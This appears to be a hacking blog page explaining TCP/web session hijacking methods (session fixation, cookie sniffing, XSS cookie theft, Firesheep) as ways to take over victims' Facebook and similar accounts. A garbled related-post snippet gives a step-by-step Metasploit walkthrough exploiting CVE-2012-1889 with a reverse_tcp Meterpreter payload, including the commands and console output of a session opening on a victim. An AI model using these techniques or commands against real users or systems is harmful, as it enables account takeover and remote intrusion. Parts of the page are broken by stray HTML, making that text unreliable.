TCP session hijacking is when a hacker takes over a TCP session between
two machines. Since most authentication only occurs at the start of a
TCP session, this allows the hacker to gain access to a machine
Different Session Hijacking methods:
Session stealing is achieved by following methods
1.
Session fixation:
In this method, the Hacker sets a user's session id to known
victim. For example, Hacker will send email to known victim with a link
that contains a particular session id. If the victim followed that
link, the hacker can use that session and gain access.
2.
Session SideJacking(session Sniffing):
In this method, the attacker use packet sniffing to and steal the
Session cookie. In order to prevent this, some websites use
SSL(encrypts the session). but do not use encryption for the rest of
the site once authenticated. This allows attackers that can read the
network traffic to intercept all the data that is submitted to the
server or web pages viewed by the client.
Unsecured Hotspots are vulnerable to this type of Session Hijacking.
3.
Client-side attacks (XSS, Malicious JavaScript Codes, Trojans, etc):
Hacker can steal the Session by running the Malicious Javascript
codes in client system. Usually hackers attack some websites using XSS
and insert their own Malicious Javascript codes.
In client point view it is trusted website, he will visit the website.
When victim visit the link , Malicious Javascript will executed. It
will steal the Session cookies and other confidential data.
4.
Physical access:
If the hacker has physical access, it is easy for him to steal
the Session. Usually this will occur in public cafe. In public cafe ,
one use login to some websites(facebook, gmail). A hacker come after
victim can steal the session cookies.
Session Hijacking using Firesheep-Mozilla Addon:
Firesheep is Famous Mozilla addon that made Session Hijacking very easy.
Using Firesheep , you can steal the Session of Public WI FI users.
Using Firesheep, you can gain access to victim account of the Facebook,
twitter and some other websites. Read more about Firesheep:
How to Hack Facebook Account using FireSheep
Related Posts
192.168.56.12:1565) Type "sessions" to list the active sessions . Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Type "sysinfo" in the meterpreter to get the system information." href="https://elit-hackers.blogspot.com/2012/07/cve-2012-1889-microsoft-xml-core_30.html">CVE-2012-1889: Microsoft XML Core Services Vulnerability A vulnerability in Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 allows remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker would have no way to force users to visit such a website. Instead, an attacker would have to convince users to visit the website, typically by getting them to click a link in an email message or Instant Messenger message that takes them to the attacker's website. The vulnerability affects all supported releases of Microsoft Windows, and all supported editions of Microsoft Office 2003 and Microsoft Office 2007. Here you can the full list. The vulnerability exists when MSXML attempts to access an object in memory that has not been initialized, which may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user. I am going to demonstrate how to use Metasploit tool for testing whether your network vulnerable or not. Open the Terminal and type "msfupdate" to get the latest metasploit modules. Once update is finished, then type "msfconsole". Then type the following command in the console "use exploit/windows/browser/msxml_get_definition_code_exec". Now we have to know the list of settings available for this exploit module. In order to get the list , you can type "show options" in the console. Command: set SRVHOST 192.168.56.10 Details: Here the 192.168.56.11 is the ip of Backtrack . You can get this ip by simply typing the "ifconfig" in the terminal. Command: set lhost 192.168.56.10 Command: set URIPATH / Details: The path in which our exploit will run. As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console: set payload windows/meterpreter/reverse_tcp Type "exploit" in the console. Once the victim loads the URL in his IE browser, you will get the following message in your metasploit console: [*] msxml_get_definition_code_exec - Using msvcrt ROP [*] msxml_get_definition_code_exec - 10.0.1.79:1564 - Sending html [*] Sending stage (752128 bytes) to 192.168.56.12 [*] Meterpreter session 1 opened (192.168.56.10:4444 -> 192.168.56.12:1565) Type "sessions" to list the active sessions . Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Type "sysinfo" in the meterpreter to get the system information. 
Please try to comment if i have done well or if you have finished learning from the blog
EmoticonEmoticon